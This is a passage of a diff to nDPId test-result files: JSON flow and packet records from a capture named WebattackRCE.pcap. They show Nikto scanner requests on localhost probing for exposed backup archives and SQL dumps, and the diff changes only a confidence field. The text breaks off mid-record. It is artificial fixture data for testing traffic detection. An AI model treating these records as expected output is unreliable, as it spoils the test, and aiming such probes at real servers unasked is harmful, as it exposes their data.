00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":391,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":391,"flow_packet_id":1,"flow_last_seen":1576420277293,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277293,"pkt":"AAAAAAAAAAAAAAAACABFAADB0lRAAEAGaeB\/AAABfwAAAcSWH5D4eer6AmSqt4AYAED+tQAAAQEICp1m\/VWdZv1VR0VUIC8xLnRhci5iejIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":391,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277293,"flow_last_seen":1576420277293,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277293,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50326,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":391,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277293,"flow_last_seen":1576420277293,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277293,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50326,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":392,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277295,"flow_last_seen":1576420277295,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277295,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50328,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":392,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":392,"flow_packet_id":1,"flow_last_seen":1576420277295,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277295,"pkt":"AAAAAAAAAAAAAAAACABFAADBgrRAAEAGuYB\/AAABfwAAAcSYH5BqProaPd\/PWYAYAED+tQAAAQEICp1m\/VedZv1XR0VUIC8xLnRhci5iejIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":392,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277295,"flow_last_seen":1576420277295,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277295,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50328,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":392,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277295,"flow_last_seen":1576420277295,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277295,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50328,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":393,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277296,"flow_last_seen":1576420277296,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277296,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50330,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":393,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":393,"flow_packet_id":1,"flow_last_seen":1576420277296,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277296,"pkt":"AAAAAAAAAAAAAAAACABFAADFhERAAEAGt+x\/AAABfwAAAcSaH5DLx7zvpnN3coAYAED+uQAAAQEICp1m\/VidZv1YR0VUIC8xMjcwMDEudGFyLmd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":393,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277296,"flow_last_seen":1576420277296,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277296,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50330,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":393,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277296,"flow_last_seen":1576420277296,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277296,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50330,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":394,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277298,"flow_last_seen":1576420277298,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277298,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50332,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":394,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":394,"flow_packet_id":1,"flow_last_seen":1576420277298,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277298,"pkt":"AAAAAAAAAAAAAAAACABFAADFkbNAAEAGqn1\/AAABfwAAAcScH5DniakeYsnjE4AYAED+uQAAAQEICp1m\/VqdZv1aR0VUIC8xMjcwMDEudGFyLmd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":394,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277298,"flow_last_seen":1576420277298,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277298,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50332,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":394,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277298,"flow_last_seen":1576420277298,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277298,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50332,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":395,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277299,"flow_last_seen":1576420277299,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277299,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50334,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":395,"flow_packet_id":1,"flow_last_seen":1576420277299,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277299,"pkt":"AAAAAAAAAAAAAAAACABFAADATXFAAEAG7sR\/AAABfwAAAcSeH5C5OnXDLQhZdIAYAED+tAAAAQEICp1m\/VudZv1bR0VUIC8xMjcwLnNxbCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":395,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277299,"flow_last_seen":1576420277299,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277299,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50334,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":395,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277299,"flow_last_seen":1576420277299,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277299,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50334,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":396,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277301,"flow_last_seen":1576420277301,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277301,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50336,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":396,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":396,"flow_packet_id":1,"flow_last_seen":1576420277301,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277301,"pkt":"AAAAAAAAAAAAAAAACABFAADAvp1AAEAGfZh\/AAABfwAAAcSgH5BBBoY3\/wT40oAYAED+tAAAAQEICp1m\/V2dZv1dR0VUIC8xMjcwLnNxbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":396,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277301,"flow_last_seen":1576420277301,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277301,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50336,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":396,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277301,"flow_last_seen":1576420277301,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277301,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50336,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":397,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277302,"flow_last_seen":1576420277302,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277302,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50338,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":397,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":397,"flow_packet_id":1,"flow_last_seen":1576420277302,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277302,"pkt":"AAAAAAAAAAAAAAAACABFAADG+c1AAEAGQmJ\/AAABfwAAAcSiH5Dkc8Fn99puBYAYAED+ugAAAQEICp1m\/V6dZv1eR0VUIC8xMjcwMDEudGFyLmJ6MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":397,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277302,"flow_last_seen":1576420277302,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277302,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50338,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":397,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277302,"flow_last_seen":1576420277302,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277302,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50338,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":398,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277304,"flow_last_seen":1576420277304,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277304,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50340,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":398,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":398,"flow_packet_id":1,"flow_last_seen":1576420277304,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277304,"pkt":"AAAAAAAAAAAAAAAACABFAADGn2FAAEAGnM5\/AAABfwAAAcSkH5ABoKfybJgPqoAYAED+ugAAAQEICp1m\/WCdZv1gR0VUIC8xMjcwMDEudGFyLmJ6MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":398,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277304,"flow_last_seen":1576420277304,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277304,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50340,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":398,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277304,"flow_last_seen":1576420277304,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277304,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50340,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 